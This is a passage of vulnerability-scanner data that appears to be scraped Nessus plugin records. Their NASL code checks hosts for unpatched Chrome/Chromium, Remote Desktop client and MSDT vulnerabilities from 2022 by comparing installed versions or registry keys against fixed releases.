:\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162839);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\"CVE-2022-2294\", \"CVE-2022-2295\", \"CVE-2022-2296\");\n script_xref(name:\"IAVA\", value:\"2022-A-0262-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (744ec9d7-fe0f-11ec-bcd2-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by multiple\nvulnerabilities as referenced in the 744ec9d7-fe0f-11ec-bcd2-3065ec8fd3ec advisory.\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote\n attacker who convinced a user to engage in specific user interactions to potentially exploit heap\n corruption via direct UI interactions. (CVE-2022-2296)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f10a4e5\");\n # https://vuxml.freebsd.org/freebsd/744ec9d7-fe0f-11ec-bcd2-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f39f44de\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2296\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<103.0.5060.114'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-28T15:09:35", "description": "The remote Debian 11 host has packages installed that are affected by multiple vulnerabilities as referenced in the dsa-5180 advisory.\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via direct UI interactions. (CVE-2022-2296)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "Debian DSA-5180-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2023-03-23T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5180.NASL", "href": "https://www.tenable.com/plugins/nessus/163024", "sourceData": "#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5180. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163024);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\"CVE-2022-2294\", \"CVE-2022-2295\", \"CVE-2022-2296\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Debian DSA-5180-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by multiple vulnerabilities as referenced in the\ndsa-5180 advisory.\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote\n attacker who convinced a user to engage in specific user interactions to potentially exploit heap\n corruption via direct UI interactions. (CVE-2022-2296)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5180\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-2294\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-2295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-2296\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), these problems have been fixed in version 103.0.5060.114-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2296\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '103.0.5060.114-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '103.0.5060.114-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '103.0.5060.114-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '103.0.5060.114-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '103.0.5060.114-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '103.0.5060.114-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-28T15:09:12", "description": "The version of Google Chrome installed on the remote macOS host is prior to 103.0.5060.114. It is, therefore, affected by multiple vulnerabilities as referenced in the 2022_07_stable-channel-update-for-desktop advisory.\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via direct UI interactions. (CVE-2022-2296)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-04T00:00:00", "type": "nessus", "title": "Google Chrome < 103.0.5060.114 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2023-03-23T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_103_0_5060_114.NASL", "href": "https://www.tenable.com/plugins/nessus/162705", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162705);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\"CVE-2022-2294\", \"CVE-2022-2295\", \"CVE-2022-2296\");\n script_xref(name:\"IAVA\", value:\"2022-A-0262-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Google Chrome < 103.0.5060.114 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 103.0.5060.114. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2022_07_stable-channel-update-for-desktop advisory.\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote\n attacker who convinced a user to engage in specific user interactions to potentially exploit heap\n corruption via direct UI interactions. (CVE-2022-2296)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f10a4e5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1341043\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1336869\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1327087\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 103.0.5060.114 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2296\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'103.0.5060.114', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-28T15:09:11", "description": "The version of Google Chrome installed on the remote Windows host is prior to 103.0.5060.114. It is, therefore, affected by multiple vulnerabilities as referenced in the 2022_07_stable-channel-update-for-desktop advisory.\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via direct UI interactions. (CVE-2022-2296)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-04T00:00:00", "type": "nessus", "title": "Google Chrome < 103.0.5060.114 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2023-03-21T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_103_0_5060_114.NASL", "href": "https://www.tenable.com/plugins/nessus/162706", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162706);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/21\");\n\n script_cve_id(\"CVE-2022-2294\", \"CVE-2022-2295\", \"CVE-2022-2296\");\n script_xref(name:\"IAVA\", value:\"2022-A-0262-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Google Chrome < 103.0.5060.114 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 103.0.5060.114. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2022_07_stable-channel-update-for-desktop advisory.\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote\n attacker who convinced a user to engage in specific user interactions to potentially exploit heap\n corruption via direct UI interactions. (CVE-2022-2296)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f10a4e5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1341043\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1336869\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1327087\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 103.0.5060.114 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2296\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'103.0.5060.114', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-19T15:00:41", "description": "The Windows Remote Desktop client for Windows installed on the remote host is missing security updates. It is, therefore, affected by a remote code execution vulnerability in the Windows Graphics component. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-13T00:00:00", "type": "nessus", "title": "Remote Desktop Client for Windows RCE (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30221"], "modified": "2023-10-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_RDC.NASL", "href": "https://www.tenable.com/plugins/nessus/163073", "sourceData": "##\n# Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163073);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/18\");\n\n script_cve_id(\"CVE-2022-30221\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"Remote Desktop Client for Windows RCE (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows app installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows Remote Desktop client for Windows installed on the remote host is missing security updates. It is, \ntherefore, affected by a remote code execution vulnerability in the Windows Graphics component. An attacker can exploit\nthis to bypass authentication and execute unauthorized arbitrary commands.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dfc3007\");\n # https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/windowsdesktop-whatsnew#updates-for-version-123317\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7b1f8019\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to client version 1.2.3317 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"remote_desktop_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Remote Desktop\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar appname = \"Microsoft Remote Desktop\";\n\nvar app_info = vcf::get_app_info(app:appname, win_local:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'fixed_version' : '1.2.3317' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:19", "description": "The remote host has the HKEY_CLASSES_ROOT\\ms-msdt registry key. This is a known exposure for CVE-2022-30190.\n\nNote that Nessus has not tested for CVE-2022-30190. It is only checking if the registry key exists. The recommendation is to apply the latest patch.", "cvss3": {}, "published": "2022-05-31T00:00:00", "type": "nessus", "title": "The Microsoft Windows Support Diagnostic Tool (MSDT) RCE Workaround Detection (CVE-2022-30190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-28T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "x-cpe:/a:microsoft:msdt"], "id": "MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/161691", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161691);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/28\");\n\n script_name(english:\"The Microsoft Windows Support Diagnostic Tool (MSDT) RCE Workaround Detection (CVE-2022-30190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Checks for the HKEY_CLASSES_ROOT\\ms-msdt registry key.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has the HKEY_CLASSES_ROOT\\ms-msdt registry key. This is a known exposure for CVE-2022-30190.\n\nNote that Nessus has not tested for CVE-2022-30190. It is only checking if the registry key exists. The recommendation is\nto apply the latest patch.\");\n # https://community.tenable.com/s/article/Microsoft-CVE-2022-30190-Patch-and-Workaround-Plugin-Advisement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?440e4ba1\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\n script_set_attribute(attribute:\"see_also\", 